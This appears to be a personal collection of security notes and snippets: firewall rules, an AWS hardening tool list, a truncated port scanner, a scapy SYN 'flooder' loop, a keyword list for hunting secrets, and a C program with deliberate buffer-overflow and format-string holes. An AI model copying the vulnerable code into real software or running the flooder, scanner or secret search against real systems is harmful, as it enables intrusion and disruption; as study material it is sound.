0x9090

iptables -P INPUT ACCEPT
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -L -v

0x9090

--- Reproduced From OneUpSecurity (Justin Taft) --- https://www.oneupsecurity.com/research/five-minute-guide-to-software-security/


Education is the best way to mitigate security breaches. Remember, security is not only a business decision, but also a moral decision. Always seek advice from an experienced security professional.

Hacker Mentality
Study and question everything. Break to learn, don't learn to break.

Don't assume something is secure without testing it.
Secure specifications are often implemented insecurely.

0x9090

<?xml version="1.0" encoding="UTF-8"?>

<opml version="1.0">
    <head>
        <title>Nops subscriptions in feedly Cloud</title>
    </head>
    <body>
        <outline text="Security" title="Security">
            <outline type="rss" text="X-Force Research – Security Intelligence" title="X-Force Research – Security Intelligence" xmlUrl="http://securityintelligence.com/topics/x-force/feed/" htmlUrl="https://securityintelligence.com"/>
            <outline type="rss" text="SecurityIntelligence" title="SecurityIntelligence" xmlUrl="http://securityint.blogspot.com/feeds/posts/default" htmlUrl="http://securityint.blogspot.com/"/>

0x9090

#!/bin/sh

# Usage:
#   makeApp.sh <appname> <url> <iconurl>
#
# Examples:
#   ./makeApp.sh Gmail https://gmail.com http://3.bp.blogspot.com/_rx1dHU9EQFY/THCcfaArRsI/AAAAAAAAB-k/-T1oLDCAEZg/s1600/gmail_logo_contact.png
#   ./makeApp.sh Gmail file:///path/to/my/downloaded/icon

# The app name. Example "Gmail". No spaces.

0x9090

#!/usr/bin/env python
import socket
import subprocess
import sys
from datetime import datetime


remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)

0x9090

import sys
from scapy.all import *

print "Field Values of packet sent"
p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S")/"flooder"
ls(p)
print "Sending Packets in 0.3 second intervals for timeout of 4 sec"
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4)
print "Summary of answered & unanswered packets"
ans.summary()

0x9090

#!/bin/bash

dd if=/dev/zero of=filename bs=$((1024*1024)) count=$((10*1024))

0x9090

This document outlines several ways to harden your AWS environment using free tools and paid services.

1. Scout2 (free) - https://github.com/nccgroup/Scout2
    * Scout2 is focused toward pentesters doing one-time audits of AWS environment configuration issues. Can output a report as HTML or JSON
2. Prowler (free) - https://github.com/toniblyx/prowler
    * Checks the items from the CIS Amazon Web Services Foundations Benchmark. - https://www.cisecurity.org/benchmark/amazon_web_services/
3. CloudSploit (free/paid) - https://github.com/cloudsploit/scans
    * CloudSploit is a paid service, but it has two free options. One allows you to use their website to run a manual scan, and the other is they've open-sourced their engine and its rules so you can run it yourself.
4. AWS Trusted Advisor (freemium) - console.aws.amazon.com/trustedadvisor/
    * AWS Trusted Advisor comes free with your AWS account and provides not only security checks, but also cost optimization, performance, and fault tolerance checks.

0x9090

admin
pass
key
secret
cert
cred
auth
crypt
hash
hmac

0x9090

#include <stdio.h>
int main(int argc, char * argv[])
{
    char a[1024];
    strcpy(a, argv[1]);
    printf(a);
    printf("\n");
}